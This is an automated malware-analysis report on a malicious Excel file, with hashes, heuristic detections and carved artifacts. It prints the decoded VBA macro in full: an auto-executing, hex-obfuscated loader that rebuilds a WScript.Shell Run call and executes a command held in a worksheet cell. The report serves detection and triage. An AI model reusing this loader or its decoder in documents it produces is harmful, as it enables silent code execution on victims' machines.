Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ce06d6c42cee28a0…

MALICIOUS

Office (OLE)

Size: 131.0 KB
Created: 2018-06-24 08:04:46
Authoring application: Microsoft Excel
First seen: 2018-11-13
MD5: e0065029da7209d01e536f9a416d3737
SHA-1: 280e3e5577b8a1e7f3dbbb56a211fdc52b11c24e
SHA-256: ce06d6c42cee28a0a8e8a852a6f67f62fbc91300f9a220d54c2f7eae32abc243
Risk score: 362

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

This Excel file contains heavily obfuscated VBA macros, including the auto-executing Document_Open and Workbook_Open routines. The macros use CreateObject and CallByName to execute code, strongly suggesting the download and execution of a secondary payload. The presence of XLM macros further indicates a multi-stage attack. The string arguments passed to the VBU_ function, such as VBU_("B2AEBECDC4CBCF89AEC3C0C7C7") and VBU_("ADD0C9"), are hex-encoded values that VBU_ decodes at runtime and are likely commands or object names related to payload execution.

Heuristics (10)

  • ClamAV: Xls.Malware.Valyria-6700360-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700360-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 229 bytes
SHA-256: b07e9b3c0bc67a5abf1f3d5a279d12af20bcec7c89268c78faaa2dc946b3582d
Preview (first 1,000 lines of the extracted script):
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  MPro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3034 bytes
SHA-256: 771771d2729dad8fe594db16f5a51e7d0d794900c955bda807b09458ece4e560
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function GUCFVPHU() As String
D aGUCFVPHU As String
aGUCFVPHU = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myGUCFVPHU = aGUCFVPHU
DimDimMsgBox ((aGUCFVPHU & myGUCFVPHU, 28))
End Function

Public Sub WEG_()
    Dim PUH_ As Object: Set PUH_ = CreateObject(VBU_("B2AEBECDC4CBCF89AEC3C0C7C7"))
    CallByName PUH_, VBU_("ADD0C9"), VbMethod, VBU_(ThisWorkbook.Sheets("MProp").Range("J225").Value), 0, True
End Sub
Private Function TAMQPDHI() As String
D aTAMQPDHI As String
aTAMQPDHI = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myTAMQPDHI = aTAMQPDHI
DimDimMsgBox ((aTAMQPDHI & myTAMQPDHI, 28))
End Function

Sub D_()
    WEG_
End Sub
Private Function FTVEBUHZ() As String
D aFTVEBUHZ As String
aFTVEBUHZ = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myFTVEBUHZ = aFTVEBUHZ
DimDimMsgBox ((aFTVEBUHZ & myFTVEBUHZ, 28))
End Function

Public Sub Document_Open()
    Application.Run VBU_("9FBA")
End Sub
Private Function QXSIEBWR() As String
D aQXSIEBWR As String
aQXSIEBWR = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myQXSIEBWR = aQXSIEBWR
DimDimMsgBox ((aQXSIEBWR & myQXSIEBWR, 28))
End Function

Sub Workbook_Open()
    D_
End Sub
Private Function SYYTZSXC() As String
D aSYYTZSXC As String
aSYYTZSXC = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim mySYYTZSXC = aSYYTZSXC
DimDimMsgBox ((aSYYTZSXC & mySYYTZSXC, 28))
End Function

Public Function VBU_(ByVal PUH_ As String)
   Dim RUJ_ As String
   Dim ULD_ As Long
   For ULD_ = 1 To Len(PUH_) Step 2
        Dim YW_ As Long: YW_ = CLng(Chr(38) & Chr(72) & Mid(PUH_, ULD_, 2))
        RUJ_ = RUJ_ & Chr(YW_ - 91)
   Next
   VBU_ = RUJ_
End Function
Private Function COZIIHFD() As String
D aCOZIIHFD As String
aCOZIIHFD = "B39E9E9E9E9E9E9EC4B998A88B7A9EA4DC7AAB9E809E9ED39E9E9E9FBC9E9E61D59E9ED59E9E949EDCAC9ECB9E839EC99E68B8669E919ECE9E66BC96849E9EAD899E859E9E9EAA75D09EA56A667F9E9E8DD8B3B49E729E9E65"
Dim myCOZIIHFD = aCOZIIHFD
DimDimMsgBox ((aCOZIIHFD & myCOZIIHFD, 28))
End Function